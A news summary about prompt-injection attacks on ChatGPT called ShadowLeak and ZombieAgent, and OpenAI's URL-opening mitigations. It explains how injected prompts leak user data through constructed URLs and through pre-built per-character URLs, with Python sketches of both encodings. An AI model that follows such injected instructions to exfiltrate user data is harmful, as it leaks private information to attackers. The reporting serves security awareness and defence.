Key Points
- OpenAI limited ChatGPT to opening only exact URLs supplied by users, blocking the ShadowLeak attack.
- Radware’s ZombieAgent used pre‑built URLs with a single appended character to bypass the initial guardrails.
- A second OpenAI fix now blocks email‑originated links unless they are publicly indexed or user‑provided.
- Experts note that such fixes are temporary and liken the pattern to long‑standing software vulnerabilities.
- Radware’s Pascal Geenens warns that fundamental solutions are needed to fully mitigate prompt‑injection risks.
Background of the attacks
Researchers discovered a prompt‑injection technique called ShadowLeak that coaxed ChatGPT into constructing new URLs, appending query parameters or embedding user‑derived data, so that simply opening the resulting link exfiltrated that data to a server the attacker controls.
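To make the mechanism concrete, here is a minimal Python sketch of the URL‑construction pattern ShadowLeak relied on; the attacker domain and parameter name are illustrative assumptions, not details from the research.

```python
# Hypothetical sketch of URL-based exfiltration: the injected prompt asks
# the agent to build a link that carries harvested data in its query string.
# The domain and parameter name below are made up for illustration.
from urllib.parse import urlencode

ATTACKER_BASE = "https://attacker.example/collect"  # assumed endpoint

def build_exfil_url(secret: str) -> str:
    """Return a URL whose query string embeds the harvested data."""
    return f"{ATTACKER_BASE}?{urlencode({'data': secret})}"

# An agent that follows the injected instruction and opens this URL
# delivers the secret straight to the attacker's server logs.
print(build_exfil_url("jane.doe@example.com"))
# -> https://attacker.example/collect?data=jane.doe%40example.com
```

OpenAI's exact‑match rule, described next, blocks precisely this construction step: the model refuses any URL it would have to assemble itself.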
In response, OpenAI altered the system so that ChatGPT opens only URLs that exactly match a string provided by the user, refusing to modify them even when explicitly instructed to do so.
Radware’s ZombieAgent variant
Radware demonstrated a follow‑up method named ZombieAgent. Instead of asking the model to construct URLs, the injected prompt supplied a list of pre‑constructed ones, each consisting of a base address followed by a single letter or number (for example, “example.com/a” or “example.com/0”). The prompt also instructed the model to substitute a special token for spaces, which cannot appear in URLs. Because OpenAI’s initial fix only stopped the model from modifying URLs, it did not prevent the model from opening these ready‑made addresses, so data could still be exfiltrated one character at a time.
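A minimal sketch of that encoding, assuming a lowercase alphanumeric alphabet and an underscore as the stand‑in for spaces (both assumptions for illustration), shows why the scheme requires no URL modification at all:

```python
# Hypothetical sketch of the ZombieAgent encoding: one pre-built URL per
# character, each an exact string the agent can open unmodified. The base
# domain and the space token are illustrative assumptions.
import string

BASE = "https://example.com/"
SPACE_TOKEN = "_"  # assumed stand-in for spaces, which URLs cannot contain
ALPHABET = string.ascii_lowercase + string.digits + SPACE_TOKEN

# The injected prompt supplies this fixed list verbatim.
URL_LIST = {ch: BASE + ch for ch in ALPHABET}

def urls_to_open(secret: str) -> list[str]:
    """Map each character of the secret to its pre-built URL."""
    encoded = secret.lower().replace(" ", SPACE_TOKEN)
    return [URL_LIST[ch] for ch in encoded if ch in URL_LIST]

# Opening these in order leaks "jane doe" one request per character;
# the attacker reconstructs the string from the sequence in server logs.
for url in urls_to_open("jane doe"):
    print(url)
```

Because every address the model opens is an exact string from the supplied list, the exact‑match guardrail is never triggered.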
OpenAI’s second mitigation
To counter ZombieAgent, OpenAI introduced a stricter rule: ChatGPT may not open any link that originates from an email unless the link appears in a well‑known public index or is supplied directly by the user in the chat. This prevents the model from automatically following attacker‑controlled addresses delivered by email.
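The rule can be thought of as a simple allowlist check, sketched below under the assumption that the model tracks where each link came from; the actual implementation inside ChatGPT is not public.

```python
# Simplified sketch of the stricter policy as described: an email-originated
# link is opened only if it is publicly indexed or user-supplied. The sets
# and the index lookup are assumptions for illustration.
def may_open(url: str, *, from_email: bool,
             publicly_indexed: set[str], user_supplied: set[str]) -> bool:
    """Return True if the policy permits opening the link."""
    if not from_email:
        return True  # the rule applies only to links found in email
    return url in publicly_indexed or url in user_supplied

# A per-character exfiltration URL arriving by email is rejected because
# it is neither in a public index nor typed by the user.
print(may_open("https://example.com/a", from_email=True,
               publicly_indexed={"https://arstechnica.com/"},
               user_supplied=set()))  # -> False
```

Under such a check, the per‑character URLs used by ZombieAgent fail both conditions and are never fetched.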
Ongoing challenges
Both incidents illustrate a recurring pattern in software security where a mitigation is quickly followed by a new workaround. Analysts compare this cycle to the persistence of SQL injection and memory‑corruption vulnerabilities, which continue to be exploited despite years of defensive measures.
Pascal Geenens, vice president of threat intelligence at Radware, emphasized that “guardrails should not be considered fundamental solutions for the prompt injection problems. Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”
Source: arstechnica.com